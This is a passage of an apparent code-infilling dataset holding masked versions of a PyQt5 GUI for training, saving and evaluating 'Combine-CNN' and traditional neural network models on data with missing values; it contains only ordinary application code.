ok = QFileDialog.getSaveFileName(self, 'Save Model',\n '..\\\\traditionalNN.trann.json',\n 'Traditional NN json files (*.trann.json)')\n if ok:\n succeed = self.trann.saveModel(fname)\n if succeed:\n reply = QMessageBox.information(self, '保存结果',\n '模型保存成功', QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '保存结果',\n '模型保存失败', QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '保存结果', '模型保存失败',\n QMessageBox.Yes, QMessageBox.Yes)\n <mask token>\n\n def showResult(self):\n if self.sender() is self.showResultButton:\n if self.traingWidgetOnFlag['New']:\n reply = QMessageBox.information(self, '提示', '训练正在进行',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n self.showResultW = showResultWidget.ShowResultWidget(\n 'combine-CNN预测结果展示', self, 'New')\n elif self.sender() is self.showResultButtonT:\n if self.traingWidgetOnFlag['Tra']:\n reply = QMessageBox.information(self, '提示', '训练正在进行',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n self.showResultW = showResultWidget.ShowResultWidget(\n 'traditional NN预测结果展示', self, 'Tra')\n return\n\n def showJudge(self):\n if self.sender() is self.judgeResultButton:\n if self.traingWidgetOnFlag['New']:\n reply = QMessageBox.information(self, '提示', '训练正在进行',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n self.chooseJDWin = (chooseJudgeDataSetWidget.\n chooseJudgeDataSetWidget(\n 'Choose Judgement-based-on Data Set', self, 'New'))\n elif self.sender() is self.judgeResultButtonT:\n if self.traingWidgetOnFlag['Tra']:\n reply = QMessageBox.information(self, '提示', '训练正在进行',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n self.chooseJDWin = (chooseJudgeDataSetWidget.\n chooseJudgeDataSetWidget(\n 'Choose Judgement-based-on Data Set', self, 'Tra'))\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass MyMainWindow(QMainWindow):\n <mask token>\n\n def initUI(self):\n self.statusBar().showMessage('Ready')\n dataModule = QVBoxLayout()\n self.dataFileChooseButton = QPushButton('选择数据')\n self.dataFileChooseButton.setFont(QFont('微软雅黑', 16))\n self.dataLossSimulateSettingButton = QPushButton('设置数据缺失参数')\n self.dataLossSimulateSettingButton.setFont(QFont('微软雅黑', 16))\n self.dataShowButton = QPushButton('展示数据')\n self.dataShowButton.setFont(QFont('微软雅黑', 16))\n label = QLabel('Present Data:')\n label.setFont(QFont('微软雅黑', 16))\n self.presentDataName = QLabel('None')\n self.presentDataName.setFont(QFont('微软雅黑', 16))\n labelbox = QVBoxLayout()\n labelbox.addWidget(label)\n labelbox.addWidget(self.presentDataName)\n dataModule.addStretch(1)\n dataModule.addLayout(labelbox)\n dataModule.addStretch(1)\n dataModule.addWidget(self.dataFileChooseButton)\n dataModule.addStretch(1)\n dataModule.addWidget(self.dataLossSimulateSettingButton)\n dataModule.addStretch(1)\n dataModule.addWidget(self.dataShowButton)\n dataModule.addStretch(1)\n trainingModule = QVBoxLayout()\n self.setModelParametersButton = QPushButton('Model Parameters')\n self.setModelParametersButton.setFont(QFont('微软雅黑', 16))\n self.trainingButton = QPushButton('Training')\n self.trainingButton.setFont(QFont('微软雅黑', 16))\n self.saveModelButton = QPushButton('Save Model')\n self.saveModelButton.setFont(QFont('微软雅黑', 16))\n self.loadModelButton = QPushButton('Load Model')\n self.loadModelButton.setFont(QFont('微软雅黑', 16))\n label = QLabel('Present Model:')\n label.setFont(QFont('微软雅黑', 16))\n self.presentModelName = QLabel('None')\n self.presentModelName.setFont(QFont('微软雅黑', 16))\n labelbox = QVBoxLayout()\n labelbox.addWidget(label)\n labelbox.addWidget(self.presentModelName)\n trainingModule.addStretch(1)\n trainingModule.addLayout(labelbox)\n trainingModule.addStretch(1)\n trainingModule.addWidget(self.setModelParametersButton)\n trainingModule.addStretch(1)\n trainingModule.addWidget(self.trainingButton)\n trainingModule.addStretch(1)\n trainingModule.addWidget(self.saveModelButton)\n trainingModule.addStretch(1)\n trainingModule.addWidget(self.loadModelButton)\n trainingModule.addStretch(1)\n resultShowModule = QVBoxLayout()\n self.showResultButton = QPushButton('分类结果展示')\n self.showResultButton.setFont(QFont('微软雅黑', 16))\n self.judgeResultButton = QPushButton('分类结果评估')\n self.judgeResultButton.setFont(QFont('微软雅黑', 16))\n resultShowModule.addWidget(self.showResultButton)\n resultShowModule.addWidget(self.judgeResultButton)\n hboxTop = QHBoxLayout()\n hboxTop.addStretch(1)\n mcnnLabel = QLabel('Combine-CNN:')\n mcnnLabel.setFont(QFont('微软雅黑', 24, QFont.Bold))\n hboxTop.addWidget(mcnnLabel)\n hboxTop.addStretch(1)\n hboxTop.addLayout(dataModule)\n hboxTop.addStretch(1)\n hboxTop.addLayout(trainingModule)\n hboxTop.addStretch(1)\n hboxTop.addLayout(resultShowModule)\n hboxTop.addStretch(1)\n dataModuleT = QVBoxLayout()\n self.dataFileChooseButtonT = QPushButton('选择数据')\n self.dataFileChooseButtonT.setFont(QFont('微软雅黑', 16))\n self.dataLossSimulateSettingButtonT = QPushButton('设置数据缺失参数')\n self.dataLossSimulateSettingButtonT.setFont(QFont('微软雅黑', 16))\n self.dataPreProcessButtonT = QPushButton('数据预处理')\n self.dataPreProcessButtonT.setFont(QFont('微软雅黑', 16))\n self.dataShowButtonT = QPushButton('展示数据')\n self.dataShowButtonT.setFont(QFont('微软雅黑', 16))\n label = QLabel('Present Data:')\n label.setFont(QFont('微软雅黑', 16))\n self.presentDataNameT = QLabel('None')\n self.presentDataNameT.setFont(QFont('微软雅黑', 16))\n labelbox = QVBoxLayout()\n labelbox.addWidget(label)\n labelbox.addWidget(self.presentDataNameT)\n dataModuleT.addStretch(1)\n dataModuleT.addLayout(labelbox)\n dataModuleT.addStretch(1)\n dataModuleT.addWidget(self.dataFileChooseButtonT)\n dataModuleT.addStretch(1)\n dataModuleT.addWidget(self.dataLossSimulateSettingButtonT)\n dataModuleT.addStretch(1)\n dataModuleT.addWidget(self.dataPreProcessButtonT)\n dataModuleT.addStretch(1)\n dataModuleT.addWidget(self.dataShowButtonT)\n dataModuleT.addStretch(1)\n trainingModuleT = QVBoxLayout()\n self.setModelParametersButtonT = QPushButton('Model Parameters')\n self.setModelParametersButtonT.setFont(QFont('微软雅黑', 16))\n self.trainingButtonT = QPushButton('Training')\n self.trainingButtonT.setFont(QFont('微软雅黑', 16))\n self.saveModelButtonT = QPushButton('Save Model')\n self.saveModelButtonT.setFont(QFont('微软雅黑', 16))\n self.loadModelButtonT = QPushButton('Load Model')\n self.loadModelButtonT.setFont(QFont('微软雅黑', 16))\n label = QLabel('Present Model:')\n label.setFont(QFont('微软雅黑', 16))\n self.presentModelNameT = QLabel('None')\n self.presentModelNameT.setFont(QFont('微软雅黑', 16))\n labelbox = QVBoxLayout()\n labelbox.addWidget(label)\n labelbox.addWidget(self.presentModelNameT)\n trainingModuleT.addStretch(1)\n trainingModuleT.addLayout(labelbox)\n trainingModuleT.addStretch(1)\n trainingModuleT.addWidget(self.setModelParametersButtonT)\n trainingModuleT.addStretch(1)\n trainingModuleT.addWidget(self.trainingButtonT)\n trainingModuleT.addStretch(1)\n trainingModuleT.addWidget(self.saveModelButtonT)\n trainingModuleT.addStretch(1)\n trainingModuleT.addWidget(self.loadModelButtonT)\n trainingModuleT.addStretch(1)\n resultShowModuleT = QVBoxLayout()\n self.showResultButtonT = QPushButton('分类结果展示')\n self.showResultButtonT.setFont(QFont('微软雅黑', 16))\n self.judgeResultButtonT = QPushButton('分类结果评估')\n self.judgeResultButtonT.setFont(QFont('微软雅黑', 16))\n resultShowModuleT.addWidget(self.showResultButtonT)\n resultShowModuleT.addWidget(self.judgeResultButtonT)\n hboxBottom = QHBoxLayout(self)\n hboxBottom.addStretch(1)\n traditionNNLabel = QLabel('Traditional NN:')\n traditionNNLabel.setFont(QFont('微软雅黑', 24, QFont.Bold))\n hboxBottom.addWidget(traditionNNLabel)\n hboxBottom.addStretch(1)\n hboxBottom.addLayout(dataModuleT)\n hboxBottom.addStretch(1)\n hboxBottom.addLayout(trainingModuleT)\n hboxBottom.addStretch(1)\n hboxBottom.addLayout(resultShowModuleT)\n hboxBottom.addStretch(1)\n splitterLine = QLabel(self)\n splitterLine.setFont(QFont('Times', 1))\n col = QColor(0, 0, 0)\n splitterLine.setStyleSheet('QWidget { background-color: %s }' % col\n .name())\n splitterLine.resize(splitterLine.sizeHint())\n vbox = QVBoxLayout()\n vbox.addLayout(hboxTop)\n vbox.addWidget(splitterLine)\n vbox.addLayout(hboxBottom)\n mainWidget = QWidget()\n mainWidget.setLayout(vbox)\n self.setCentralWidget(mainWidget)\n self.setGeometry(350, 100, self.windowLength, self.windowHigh)\n self.setWindowTitle('适用于有缺失值数据集的神经网络系统')\n self.show()\n\n def initConnect(self):\n self.dataFileChooseButton.clicked.connect(self.chooseData)\n self.dataFileChooseButtonT.clicked.connect(self.chooseData)\n self.dataLossSimulateSettingButton.clicked.connect(self.\n setLossParameter)\n self.dataLossSimulateSettingButtonT.clicked.connect(self.\n setLossParameter)\n self.dataShowButton.clicked.connect(self.showData)\n self.dataShowButtonT.clicked.connect(self.showData)\n self.dataPreProcessButtonT.clicked.connect(self.preProcess)\n self.setModelParametersButton.clicked.connect(self.setModelParameters)\n self.setModelParametersButtonT.clicked.connect(self.setModelParameters)\n self.trainingButton.clicked.connect(self.training)\n self.trainingButtonT.clicked.connect(self.training)\n self.saveModelButton.clicked.connect(self.saveModel)\n self.saveModelButtonT.clicked.connect(self.saveModel)\n self.loadModelButton.clicked.connect(self.loadModel)\n self.loadModelButtonT.clicked.connect(self.loadModel)\n self.showResultButton.clicked.connect(self.showResult)\n self.showResultButtonT.clicked.connect(self.showResult)\n self.judgeResultButton.clicked.connect(self.showJudge)\n self.judgeResultButtonT.clicked.connect(self.showJudge)\n\n def chooseData(self):\n if self.sender() is self.dataFileChooseButton:\n self.fname['New'], ok = QFileDialog.getOpenFileName(self,\n 'Open file', '..', 'Text files (*.txt)')\n if ok:\n self.loadData()\n elif self.sender() is self.dataFileChooseButtonT:\n self.fname['Tra'], ok = QFileDialog.getOpenFileName(self,\n 'Open file', '..', 'Text files (*.txt)')\n if ok:\n self.loadData()\n return\n\n def loadData(self):\n if self.sender() is self.dataFileChooseButton:\n try:\n self.dataFor['New'] = myLoadData.loadData(self.fname['New'],\n self.dataLossRate['New'], self.dataSetLossValue['New'])\n except FileNotFoundError as e:\n reply = QMessageBox.information(self, 'Message',\n 'Data file not exist', QMessageBox.Yes, QMessageBox.Yes)\n return\n except Exception:\n reply = QMessageBox.information(self, 'Message',\n 'Data file format error', QMessageBox.Yes, QMessageBox.Yes)\n return\n dataname = self.fname['New'].split('/')[-1].split('.')[0]\n self.presentDataName.setText(dataname)\n self.presentDataName.resize(self.presentDataName.sizeHint())\n elif self.sender() is self.dataFileChooseButtonT:\n try:\n self.dataFor['Tra'] = myLoadData.loadData(self.fname['Tra'],\n self.dataLossRate['Tra'], self.dataSetLossValue['Tra'])\n except FileNotFoundError as e:\n reply = QMessageBox.information(self, 'Message',\n 'Data file not exist', QMessageBox.Yes, QMessageBox.Yes)\n return\n except Exception:\n reply = QMessageBox.information(self, 'Message',\n 'Data file format error', QMessageBox.Yes, QMessageBox.Yes)\n return\n dataname = self.fname['Tra'].split('/')[-1].split('.')[0]\n self.presentDataNameT.setText(dataname)\n self.presentDataNameT.resize(self.presentDataNameT.sizeHint())\n return\n\n def setLossParameter(self):\n if self.sender() is self.dataLossSimulateSettingButton:\n self.setLPDialog = setLossParameterDialog.setLossParameterDialog(\n 'combine-CNN设置缺失参数', self, 'New')\n elif self.sender() is self.dataLossSimulateSettingButtonT:\n self.setLPDialog = setLossParameterDialog.setLossParameterDialog(\n 'traditional NN设置缺失参数', self, 'Tra')\n return\n\n def showData(self):\n if self.sender() is self.dataShowButton:\n self.showDataW = showDataWidget.ShowDataWidget('combine-CNN数据展示',\n self, 'New')\n elif self.sender() is self.dataShowButtonT:\n self.showDataW = showDataWidget.ShowDataWidget('traditional NN数据展示'\n , self, 'Tra')\n return\n\n def preProcess(self):\n if self.dataFor['Tra'] is None:\n reply = QMessageBox.information(self, '数据错误', '没有加载数据,无法预处理',\n QMessageBox.Yes, QMessageBox.Yes)\n else:\n self.dataFor['Tra'].MeanPreProcess()\n reply = QMessageBox.information(self, 'Message',\n 'PreProcess succeed!', QMessageBox.Yes, QMessageBox.Yes)\n return\n <mask token>\n <mask token>\n\n def saveModel(self):\n if self.sender() is self.saveModelButton:\n if self.mcbcnn is None:\n reply = QMessageBox.information(self, '模型错误', '模型不存在',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n else:\n fname, ok = QFileDialog.getSaveFileName(self, 'Save Model',\n '..\\\\myCombineCNN.cbcnn.json',\n 'Combine-CNN json files (*.cbcnn.json)')\n if ok:\n succeed = self.mcbcnn.saveModel(fname)\n if succeed:\n reply = QMessageBox.information(self, '保存结果',\n '模型保存成功', QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '保存结果',\n '模型保存失败', QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '保存结果', '模型保存失败',\n QMessageBox.Yes, QMessageBox.Yes)\n elif self.sender() is self.saveModelButtonT:\n if self.trann is None:\n reply = QMessageBox.information(self, '模型错误', '模型不存在',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n else:\n fname, ok = QFileDialog.getSaveFileName(self, 'Save Model',\n '..\\\\traditionalNN.trann.json',\n 'Traditional NN json files (*.trann.json)')\n if ok:\n succeed = self.trann.saveModel(fname)\n if succeed:\n reply = QMessageBox.information(self, '保存结果',\n '模型保存成功', QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '保存结果',\n '模型保存失败', QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '保存结果', '模型保存失败',\n QMessageBox.Yes, QMessageBox.Yes)\n <mask token>\n\n def showResult(self):\n if self.sender() is self.showResultButton:\n if self.traingWidgetOnFlag['New']:\n reply = QMessageBox.information(self, '提示', '训练正在进行',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n self.showResultW = showResultWidget.ShowResultWidget(\n 'combine-CNN预测结果展示', self, 'New')\n elif self.sender() is self.showResultButtonT:\n if self.traingWidgetOnFlag['Tra']:\n reply = QMessageBox.information(self, '提示', '训练正在进行',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n self.showResultW = showResultWidget.ShowResultWidget(\n 'traditional NN预测结果展示', self, 'Tra')\n return\n\n def showJudge(self):\n if self.sender() is self.judgeResultButton:\n if self.traingWidgetOnFlag['New']:\n reply = QMessageBox.information(self, '提示', '训练正在进行',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n self.chooseJDWin = (chooseJudgeDataSetWidget.\n chooseJudgeDataSetWidget(\n 'Choose Judgement-based-on Data Set', self, 'New'))\n elif self.sender() is self.judgeResultButtonT:\n if self.traingWidgetOnFlag['Tra']:\n reply = QMessageBox.information(self, '提示', '训练正在进行',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n self.chooseJDWin = (chooseJudgeDataSetWidget.\n chooseJudgeDataSetWidget(\n 'Choose Judgement-based-on Data Set', self, 'Tra'))\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass MyMainWindow(QMainWindow):\n <mask token>\n\n def initUI(self):\n self.statusBar().showMessage('Ready')\n dataModule = QVBoxLayout()\n self.dataFileChooseButton = QPushButton('选择数据')\n self.dataFileChooseButton.setFont(QFont('微软雅黑', 16))\n self.dataLossSimulateSettingButton = QPushButton('设置数据缺失参数')\n self.dataLossSimulateSettingButton.setFont(QFont('微软雅黑', 16))\n self.dataShowButton = QPushButton('展示数据')\n self.dataShowButton.setFont(QFont('微软雅黑', 16))\n label = QLabel('Present Data:')\n label.setFont(QFont('微软雅黑', 16))\n self.presentDataName = QLabel('None')\n self.presentDataName.setFont(QFont('微软雅黑', 16))\n labelbox = QVBoxLayout()\n labelbox.addWidget(label)\n labelbox.addWidget(self.presentDataName)\n dataModule.addStretch(1)\n dataModule.addLayout(labelbox)\n dataModule.addStretch(1)\n dataModule.addWidget(self.dataFileChooseButton)\n dataModule.addStretch(1)\n dataModule.addWidget(self.dataLossSimulateSettingButton)\n dataModule.addStretch(1)\n dataModule.addWidget(self.dataShowButton)\n dataModule.addStretch(1)\n trainingModule = QVBoxLayout()\n self.setModelParametersButton = QPushButton('Model Parameters')\n self.setModelParametersButton.setFont(QFont('微软雅黑', 16))\n self.trainingButton = QPushButton('Training')\n self.trainingButton.setFont(QFont('微软雅黑', 16))\n self.saveModelButton = QPushButton('Save Model')\n self.saveModelButton.setFont(QFont('微软雅黑', 16))\n self.loadModelButton = QPushButton('Load Model')\n self.loadModelButton.setFont(QFont('微软雅黑', 16))\n label = QLabel('Present Model:')\n label.setFont(QFont('微软雅黑', 16))\n self.presentModelName = QLabel('None')\n self.presentModelName.setFont(QFont('微软雅黑', 16))\n labelbox = QVBoxLayout()\n labelbox.addWidget(label)\n labelbox.addWidget(self.presentModelName)\n trainingModule.addStretch(1)\n trainingModule.addLayout(labelbox)\n trainingModule.addStretch(1)\n trainingModule.addWidget(self.setModelParametersButton)\n trainingModule.addStretch(1)\n trainingModule.addWidget(self.trainingButton)\n trainingModule.addStretch(1)\n trainingModule.addWidget(self.saveModelButton)\n trainingModule.addStretch(1)\n trainingModule.addWidget(self.loadModelButton)\n trainingModule.addStretch(1)\n resultShowModule = QVBoxLayout()\n self.showResultButton = QPushButton('分类结果展示')\n self.showResultButton.setFont(QFont('微软雅黑', 16))\n self.judgeResultButton = QPushButton('分类结果评估')\n self.judgeResultButton.setFont(QFont('微软雅黑', 16))\n resultShowModule.addWidget(self.showResultButton)\n resultShowModule.addWidget(self.judgeResultButton)\n hboxTop = QHBoxLayout()\n hboxTop.addStretch(1)\n mcnnLabel = QLabel('Combine-CNN:')\n mcnnLabel.setFont(QFont('微软雅黑', 24, QFont.Bold))\n hboxTop.addWidget(mcnnLabel)\n hboxTop.addStretch(1)\n hboxTop.addLayout(dataModule)\n hboxTop.addStretch(1)\n hboxTop.addLayout(trainingModule)\n hboxTop.addStretch(1)\n hboxTop.addLayout(resultShowModule)\n hboxTop.addStretch(1)\n dataModuleT = QVBoxLayout()\n self.dataFileChooseButtonT = QPushButton('选择数据')\n self.dataFileChooseButtonT.setFont(QFont('微软雅黑', 16))\n self.dataLossSimulateSettingButtonT = QPushButton('设置数据缺失参数')\n self.dataLossSimulateSettingButtonT.setFont(QFont('微软雅黑', 16))\n self.dataPreProcessButtonT = QPushButton('数据预处理')\n self.dataPreProcessButtonT.setFont(QFont('微软雅黑', 16))\n self.dataShowButtonT = QPushButton('展示数据')\n self.dataShowButtonT.setFont(QFont('微软雅黑', 16))\n label = QLabel('Present Data:')\n label.setFont(QFont('微软雅黑', 16))\n self.presentDataNameT = QLabel('None')\n self.presentDataNameT.setFont(QFont('微软雅黑', 16))\n labelbox = QVBoxLayout()\n labelbox.addWidget(label)\n labelbox.addWidget(self.presentDataNameT)\n dataModuleT.addStretch(1)\n dataModuleT.addLayout(labelbox)\n dataModuleT.addStretch(1)\n dataModuleT.addWidget(self.dataFileChooseButtonT)\n dataModuleT.addStretch(1)\n dataModuleT.addWidget(self.dataLossSimulateSettingButtonT)\n dataModuleT.addStretch(1)\n dataModuleT.addWidget(self.dataPreProcessButtonT)\n dataModuleT.addStretch(1)\n dataModuleT.addWidget(self.dataShowButtonT)\n dataModuleT.addStretch(1)\n trainingModuleT = QVBoxLayout()\n self.setModelParametersButtonT = QPushButton('Model Parameters')\n self.setModelParametersButtonT.setFont(QFont('微软雅黑', 16))\n self.trainingButtonT = QPushButton('Training')\n self.trainingButtonT.setFont(QFont('微软雅黑', 16))\n self.saveModelButtonT = QPushButton('Save Model')\n self.saveModelButtonT.setFont(QFont('微软雅黑', 16))\n self.loadModelButtonT = QPushButton('Load Model')\n self.loadModelButtonT.setFont(QFont('微软雅黑', 16))\n label = QLabel('Present Model:')\n label.setFont(QFont('微软雅黑', 16))\n self.presentModelNameT = QLabel('None')\n self.presentModelNameT.setFont(QFont('微软雅黑', 16))\n labelbox = QVBoxLayout()\n labelbox.addWidget(label)\n labelbox.addWidget(self.presentModelNameT)\n trainingModuleT.addStretch(1)\n trainingModuleT.addLayout(labelbox)\n trainingModuleT.addStretch(1)\n trainingModuleT.addWidget(self.setModelParametersButtonT)\n trainingModuleT.addStretch(1)\n trainingModuleT.addWidget(self.trainingButtonT)\n trainingModuleT.addStretch(1)\n trainingModuleT.addWidget(self.saveModelButtonT)\n trainingModuleT.addStretch(1)\n trainingModuleT.addWidget(self.loadModelButtonT)\n trainingModuleT.addStretch(1)\n resultShowModuleT = QVBoxLayout()\n self.showResultButtonT = QPushButton('分类结果展示')\n self.showResultButtonT.setFont(QFont('微软雅黑', 16))\n self.judgeResultButtonT = QPushButton('分类结果评估')\n self.judgeResultButtonT.setFont(QFont('微软雅黑', 16))\n resultShowModuleT.addWidget(self.showResultButtonT)\n resultShowModuleT.addWidget(self.judgeResultButtonT)\n hboxBottom = QHBoxLayout(self)\n hboxBottom.addStretch(1)\n traditionNNLabel = QLabel('Traditional NN:')\n traditionNNLabel.setFont(QFont('微软雅黑', 24, QFont.Bold))\n hboxBottom.addWidget(traditionNNLabel)\n hboxBottom.addStretch(1)\n hboxBottom.addLayout(dataModuleT)\n hboxBottom.addStretch(1)\n hboxBottom.addLayout(trainingModuleT)\n hboxBottom.addStretch(1)\n hboxBottom.addLayout(resultShowModuleT)\n hboxBottom.addStretch(1)\n splitterLine = QLabel(self)\n splitterLine.setFont(QFont('Times', 1))\n col = QColor(0, 0, 0)\n splitterLine.setStyleSheet('QWidget { background-color: %s }' % col\n .name())\n splitterLine.resize(splitterLine.sizeHint())\n vbox = QVBoxLayout()\n vbox.addLayout(hboxTop)\n vbox.addWidget(splitterLine)\n vbox.addLayout(hboxBottom)\n mainWidget = QWidget()\n mainWidget.setLayout(vbox)\n self.setCentralWidget(mainWidget)\n self.setGeometry(350, 100, self.windowLength, self.windowHigh)\n self.setWindowTitle('适用于有缺失值数据集的神经网络系统')\n self.show()\n\n def initConnect(self):\n self.dataFileChooseButton.clicked.connect(self.chooseData)\n self.dataFileChooseButtonT.clicked.connect(self.chooseData)\n self.dataLossSimulateSettingButton.clicked.connect(self.\n setLossParameter)\n self.dataLossSimulateSettingButtonT.clicked.connect(self.\n setLossParameter)\n self.dataShowButton.clicked.connect(self.showData)\n self.dataShowButtonT.clicked.connect(self.showData)\n self.dataPreProcessButtonT.clicked.connect(self.preProcess)\n self.setModelParametersButton.clicked.connect(self.setModelParameters)\n self.setModelParametersButtonT.clicked.connect(self.setModelParameters)\n self.trainingButton.clicked.connect(self.training)\n self.trainingButtonT.clicked.connect(self.training)\n self.saveModelButton.clicked.connect(self.saveModel)\n self.saveModelButtonT.clicked.connect(self.saveModel)\n self.loadModelButton.clicked.connect(self.loadModel)\n self.loadModelButtonT.clicked.connect(self.loadModel)\n self.showResultButton.clicked.connect(self.showResult)\n self.showResultButtonT.clicked.connect(self.showResult)\n self.judgeResultButton.clicked.connect(self.showJudge)\n self.judgeResultButtonT.clicked.connect(self.showJudge)\n\n def chooseData(self):\n if self.sender() is self.dataFileChooseButton:\n self.fname['New'], ok = QFileDialog.getOpenFileName(self,\n 'Open file', '..', 'Text files (*.txt)')\n if ok:\n self.loadData()\n elif self.sender() is self.dataFileChooseButtonT:\n self.fname['Tra'], ok = QFileDialog.getOpenFileName(self,\n 'Open file', '..', 'Text files (*.txt)')\n if ok:\n self.loadData()\n return\n\n def loadData(self):\n if self.sender() is self.dataFileChooseButton:\n try:\n self.dataFor['New'] = myLoadData.loadData(self.fname['New'],\n self.dataLossRate['New'], self.dataSetLossValue['New'])\n except FileNotFoundError as e:\n reply = QMessageBox.information(self, 'Message',\n 'Data file not exist', QMessageBox.Yes, QMessageBox.Yes)\n return\n except Exception:\n reply = QMessageBox.information(self, 'Message',\n 'Data file format error', QMessageBox.Yes, QMessageBox.Yes)\n return\n dataname = self.fname['New'].split('/')[-1].split('.')[0]\n self.presentDataName.setText(dataname)\n self.presentDataName.resize(self.presentDataName.sizeHint())\n elif self.sender() is self.dataFileChooseButtonT:\n try:\n self.dataFor['Tra'] = myLoadData.loadData(self.fname['Tra'],\n self.dataLossRate['Tra'], self.dataSetLossValue['Tra'])\n except FileNotFoundError as e:\n reply = QMessageBox.information(self, 'Message',\n 'Data file not exist', QMessageBox.Yes, QMessageBox.Yes)\n return\n except Exception:\n reply = QMessageBox.information(self, 'Message',\n 'Data file format error', QMessageBox.Yes, QMessageBox.Yes)\n return\n dataname = self.fname['Tra'].split('/')[-1].split('.')[0]\n self.presentDataNameT.setText(dataname)\n self.presentDataNameT.resize(self.presentDataNameT.sizeHint())\n return\n\n def setLossParameter(self):\n if self.sender() is self.dataLossSimulateSettingButton:\n self.setLPDialog = setLossParameterDialog.setLossParameterDialog(\n 'combine-CNN设置缺失参数', self, 'New')\n elif self.sender() is self.dataLossSimulateSettingButtonT:\n self.setLPDialog = setLossParameterDialog.setLossParameterDialog(\n 'traditional NN设置缺失参数', self, 'Tra')\n return\n\n def showData(self):\n if self.sender() is self.dataShowButton:\n self.showDataW = showDataWidget.ShowDataWidget('combine-CNN数据展示',\n self, 'New')\n elif self.sender() is self.dataShowButtonT:\n self.showDataW = showDataWidget.ShowDataWidget('traditional NN数据展示'\n , self, 'Tra')\n return\n\n def preProcess(self):\n if self.dataFor['Tra'] is None:\n reply = QMessageBox.information(self, '数据错误', '没有加载数据,无法预处理',\n QMessageBox.Yes, QMessageBox.Yes)\n else:\n self.dataFor['Tra'].MeanPreProcess()\n reply = QMessageBox.information(self, 'Message',\n 'PreProcess succeed!', QMessageBox.Yes, QMessageBox.Yes)\n return\n <mask token>\n\n def training(self):\n if self.sender() is self.trainingButton:\n if self.trainingW is not None:\n self.trainingW.hide()\n self.trainingW.show()\n return\n senderName = 'New'\n elif self.sender() is self.trainingButtonT:\n if self.trainingWT is not None:\n self.trainingWT.hide()\n self.trainingWT.show()\n senderName = 'Tra'\n if self.dataFor[senderName] is None:\n reply = QMessageBox.information(self, '数据错误', '没有加载数据,无法训练',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n elif senderName == 'New':\n if self.dataFor[senderName].DataTrainX.shape[1\n ] < self.combineNumConv:\n reply = QMessageBox.information(self, '参数错误',\n '卷积层组合(卷积核)大小大于数据集特征数量', QMessageBox.Yes, QMessageBox.Yes)\n return\n if combineNumCalculate.combineNumCal(self.dataFor[senderName].\n DataTrainX.shape[1], self.combineNumConv\n ) < self.combineNumPooling:\n reply = QMessageBox.information(self, '参数错误',\n '池化层组合(池化核)大小大于卷积层输出特征向量维度', QMessageBox.Yes,\n QMessageBox.Yes)\n return\n if self.trainingWT is not None:\n reply = QMessageBox.information(self, '提示',\n 'traditional NN训练正在进行,请等待其结束', QMessageBox.Yes,\n QMessageBox.Yes)\n return\n self.trainingW = TrainingWidget.trainningWidget('combine-CNN训练',\n self, senderName)\n self.traingWidgetOnFlag[senderName] = False\n elif senderName == 'Tra':\n if self.trainingW is not None:\n reply = QMessageBox.information(self, '提示',\n 'combine-CNN训练正在进行,请等待其结束', QMessageBox.Yes,\n QMessageBox.Yes)\n return\n self.trainingWT = TrainingWidget.trainningWidget('traditional NN训练'\n , self, senderName)\n self.traingWidgetOnFlag[senderName] = False\n return\n\n def saveModel(self):\n if self.sender() is self.saveModelButton:\n if self.mcbcnn is None:\n reply = QMessageBox.information(self, '模型错误', '模型不存在',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n else:\n fname, ok = QFileDialog.getSaveFileName(self, 'Save Model',\n '..\\\\myCombineCNN.cbcnn.json',\n 'Combine-CNN json files (*.cbcnn.json)')\n if ok:\n succeed = self.mcbcnn.saveModel(fname)\n if succeed:\n reply = QMessageBox.information(self, '保存结果',\n '模型保存成功', QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '保存结果',\n '模型保存失败', QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '保存结果', '模型保存失败',\n QMessageBox.Yes, QMessageBox.Yes)\n elif self.sender() is self.saveModelButtonT:\n if self.trann is None:\n reply = QMessageBox.information(self, '模型错误', '模型不存在',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n else:\n fname, ok = QFileDialog.getSaveFileName(self, 'Save Model',\n '..\\\\traditionalNN.trann.json',\n 'Traditional NN json files (*.trann.json)')\n if ok:\n succeed = self.trann.saveModel(fname)\n if succeed:\n reply = QMessageBox.information(self, '保存结果',\n '模型保存成功', QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '保存结果',\n '模型保存失败', QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '保存结果', '模型保存失败',\n QMessageBox.Yes, QMessageBox.Yes)\n <mask token>\n\n def showResult(self):\n if self.sender() is self.showResultButton:\n if self.traingWidgetOnFlag['New']:\n reply = QMessageBox.information(self, '提示', '训练正在进行',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n self.showResultW = showResultWidget.ShowResultWidget(\n 'combine-CNN预测结果展示', self, 'New')\n elif self.sender() is self.showResultButtonT:\n if self.traingWidgetOnFlag['Tra']:\n reply = QMessageBox.information(self, '提示', '训练正在进行',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n self.showResultW = showResultWidget.ShowResultWidget(\n 'traditional NN预测结果展示', self, 'Tra')\n return\n\n def showJudge(self):\n if self.sender() is self.judgeResultButton:\n if self.traingWidgetOnFlag['New']:\n reply = QMessageBox.information(self, '提示', '训练正在进行',\n 